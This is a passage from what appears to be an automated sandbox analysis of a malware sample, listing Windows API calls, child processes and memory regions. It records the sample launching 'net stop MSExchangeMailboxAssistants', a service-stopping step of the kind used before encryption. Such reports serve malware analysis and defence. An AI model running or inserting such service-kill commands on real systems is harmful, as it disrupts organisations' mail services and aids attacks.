(_String1="net", _String2="ECHO") returned 9 [0137.581] _wcsicmp (_String1="net", _String2="SET") returned -5 [0137.581] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0137.581] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0137.582] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0137.582] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0137.582] _wcsicmp (_String1="net", _String2="MD") returned 1 [0137.582] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0137.582] _wcsicmp (_String1="net", _String2="RD") returned -4 [0137.582] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0137.582] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0137.582] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0137.582] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0137.582] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0137.582] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0137.582] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0137.582] _wcsicmp (_String1="net", _String2="VER") returned -8 [0137.582] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0137.582] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0137.582] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0137.582] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0137.582] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0137.582] _wcsicmp (_String1="net", _String2="START") returned -5 [0137.582] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0137.582] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0137.582] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0137.582] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0137.582] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0137.582] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0137.582] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0137.582] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0137.582] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0137.582] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0137.582] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0137.582] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0137.582] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0137.582] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0137.582] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0137.582] _wcsicmp (_String1="net", _String2="CD") returned 11 [0137.582] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0137.582] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0137.582] _wcsicmp (_String1="net", _String2="REN") returned -4 [0137.582] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0137.582] _wcsicmp (_String1="net", _String2="SET") returned -5 [0137.582] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0137.582] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0137.582] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0137.582] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0137.582] _wcsicmp (_String1="net", _String2="MD") returned 1 [0137.582] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0137.582] _wcsicmp (_String1="net", _String2="RD") returned -4 [0137.582] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0137.582] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0137.582] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0137.582] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0137.582] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0137.582] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0137.582] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0137.582] _wcsicmp (_String1="net", _String2="VER") returned -8 [0137.582] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0137.582] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0137.582] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0137.583] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0137.583] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0137.583] _wcsicmp (_String1="net", _String2="START") returned -5 [0137.583] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0137.583] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0137.583] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0137.583] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0137.583] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0137.583] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0137.583] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0137.583] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0137.583] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0137.583] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0137.583] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0137.583] _wcsicmp (_String1="net", _String2="IF") returned 5 [0137.583] _wcsicmp (_String1="net", _String2="REM") returned -4 [0137.583] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0137.583] SetErrorMode (uMode=0x0) returned 0x0 [0137.583] SetErrorMode (uMode=0x1) returned 0x0 [0137.583] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4f305d0, lpFilePart=0x4ebeefc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4ebeefc*="Desktop") returned 0x1d [0137.583] SetErrorMode (uMode=0x0) returned 0x1 [0137.583] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0137.583] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0137.591] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0137.591] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0137.591] GetConsoleTitleW (in: lpConsoleTitle=0x4ebf17c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0137.591] InitializeProcThreadAttributeList (in: lpAttributeList=0x4ebf0a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4ebf08c | out: lpAttributeList=0x4ebf0a8, lpSize=0x4ebf08c) returned 1 [0137.591] UpdateProcThreadAttribute (in: lpAttributeList=0x4ebf0a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x4ebf094, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4ebf0a8, lpPreviousValue=0x0) returned 1 [0137.591] GetStartupInfoW (in: lpStartupInfo=0x4ebf0e0 | out: lpStartupInfo=0x4ebf0e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0137.592] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0137.592] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0137.593] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeMailboxAssistants", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4ebf030*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeMailboxAssistants", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4ebf07c | out: lpCommandLine="net stop MSExchangeMailboxAssistants", lpProcessInformation=0x4ebf07c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xa94, dwThreadId=0xaa0)) returned 1 [0137.599] CloseHandle (hObject=0xa4) returned 1 [0137.599] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0137.599] GetEnvironmentStringsW () returned 0x4f39ef0* [0137.600] FreeEnvironmentStringsA (penv="=") returned 1 [0137.600] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0137.777] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4ebf014 | out: lpExitCode=0x4ebf014*=0x2) returned 1 [0137.777] CloseHandle (hObject=0xa8) returned 1 [0137.777] _vsnwprintf (in: _Buffer=0x4ebf0fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x4ebf01c | out: _Buffer="00000002") returned 8 [0137.777] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0137.777] GetEnvironmentStringsW () returned 0x4f3b338* [0137.777] FreeEnvironmentStringsA (penv="=") returned 1 [0137.777] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0137.777] GetEnvironmentStringsW () returned 0x4f3b338* [0137.777] FreeEnvironmentStringsA (penv="=") returned 1 [0137.777] DeleteProcThreadAttributeList (in: lpAttributeList=0x4ebf0a8 | out: lpAttributeList=0x4ebf0a8) [0137.777] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.777] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0137.778] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.778] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0137.778] _get_osfhandle (_FileHandle=0) returned 0x38 [0137.778] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0137.778] SetConsoleInputExeNameW () returned 0x1 [0137.778] GetConsoleOutputCP () returned 0x1b5 [0137.778] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0137.778] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.779] exit (_Code=2) Thread: id = 663 os_tid = 0xa84 Process: id = "218" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x29b9c000" os_pid = "0xa90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "217" os_parent_pid = "0x824" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10745 start_va = 0x7fae8000 end_va = 0x7fae8fff entry_point = 0x0 region_type = private name = "private_0x000000007fae8000" filename = "" Region: id = 10746 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10747 start_va = 0x1b131c0000 end_va = 0x1b131dffff entry_point = 0x0 region_type = private name = "private_0x0000001b131c0000" filename = "" Region: id = 10748 start_va = 0x1b131e0000 end_va = 0x1b131f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001b131e0000" filename = "" Region: id = 10749 start_va = 0x1b13200000 end_va = 0x1b1323ffff entry_point = 0x0 region_type = private name = "private_0x0000001b13200000" filename = "" Region: id = 10750 start_va = 0x7df5ff840000 end_va = 0x7ff5ff83ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff840000" filename = "" Region: id = 10751 start_va = 0x7ff6c39e0000 end_va = 0x7ff6c3a02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c39e0000" filename = "" Region: id = 10752 start_va = 0x7ff6c3a0c000 end_va = 0x7ff6c3a0cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3a0c000" filename = "" Region: id = 10753 start_va = 0x7ff6c3a0e000 end_va = 0x7ff6c3a0ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3a0e000" filename = "" Region: id = 10754 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 10755 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10756 start_va = 0x1b131c0000 end_va = 0x1b131cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001b131c0000" filename = "" Region: id = 10757 start_va = 0x1b131d0000 end_va = 0x1b131d6fff entry_point = 0x0 region_type = private name = "private_0x0000001b131d0000" filename = "" Region: id = 10758 start_va = 0x1b13240000 end_va = 0x1b132fdfff entry_point = 0x1b13240000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10759 start_va = 0x1b13300000 end_va = 0x1b13300fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001b13300000" filename = "" Region: id = 10760 start_va = 0x1b13310000 end_va = 0x1b1340ffff entry_point = 0x0 region_type = private name = "private_0x0000001b13310000" filename = "" Region: id = 10761 start_va = 0x1b13410000 end_va = 0x1b1344ffff entry_point = 0x0 region_type = private name = "private_0x0000001b13410000" filename = "" Region: id = 10762 start_va = 0x1b13450000 end_va = 0x1b13456fff entry_point = 0x0 region_type = private name = "private_0x0000001b13450000" filename = "" Region: id = 10763 start_va = 0x1b13460000 end_va = 0x1b13460fff entry_point = 0x0 region_type = private name = "private_0x0000001b13460000" filename = "" Region: id = 10764 start_va = 0x1b13470000 end_va = 0x1b13470fff entry_point = 0x0 region_type = private name = "private_0x0000001b13470000" filename = "" Region: id = 10765 start_va = 0x1b134e0000 end_va = 0x1b134effff entry_point = 0x0 region_type = private name = "private_0x0000001b134e0000" filename = "" Region: id = 10766 start_va = 0x1b134f0000 end_va = 0x1b13677fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001b134f0000" filename = "" Region: id = 10767 start_va = 0x1b13680000 end_va = 0x1b13800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001b13680000" filename = "" Region: id = 10768 start_va = 0x1b13810000 end_va = 0x1b14c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001b13810000" filename = "" Region: id = 10769 start_va = 0x7ff6c38e0000 end_va = 0x7ff6c39dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c38e0000" filename = "" Region: id = 10770 start_va = 0x7ff6c3a0a000 end_va = 0x7ff6c3a0bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3a0a000" filename = "" Region: id = 10771 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 10772 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 10773 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10774 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10775 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 10776 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10777 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10778 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10779 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10780 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10781 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10782 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 10783 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 10784 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 660 os_tid = 0xa54 Thread: id = 661 os_tid = 0xa88 Thread: id = 662 os_tid = 0xa58 Process: id = "219" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x12097000" os_pid = "0xa94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "217" os_parent_pid = "0x824" cmd_line = "net stop MSExchangeMailboxAssistants" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10798 start_va = 0x90000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 10799 start_va = 0xb0000 end_va = 0xb1fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 10800 start_va = 0xc0000 end_va = 0xd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 10801 start_va = 0xe0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 10802 start_va = 0x120000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 10803 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 10804 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10805 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 10806 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 10807 start_va = 0x240000 end_va = 0x423ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 10808 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10809 start_va = 0x7e420000 end_va = 0x7e442fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e420000" filename = "" Region: id = 10810 start_va = 0x7e444000 end_va = 0x7e444fff entry_point = 0x0 region_type = private name = "private_0x000000007e444000" filename = "" Region: id = 10811 start_va = 0x7e44c000 end_va = 0x7e44efff entry_point = 0x0 region_type = private name = "private_0x000000007e44c000" filename = "" Region: id = 10812 start_va = 0x7e44f000 end_va = 0x7e44ffff entry_point = 0x0 region_type = private name = "private_0x000000007e44f000" filename = "" Region: id = 10813 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10814 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10815 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10816 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10817 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10818 start_va = 0x4400000 end_va = 0x440ffff entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 10819 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10820 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10821 start_va = 0x44f0000 end_va = 0x45effff entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 10822 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 664 os_tid = 0xaa0 Thread: id = 665 os_tid = 0xf80 Process: id = "220" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x11e79000" os_pid = "0xf70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "219" os_parent_pid = "0xa94" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeMailboxAssistants" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10823 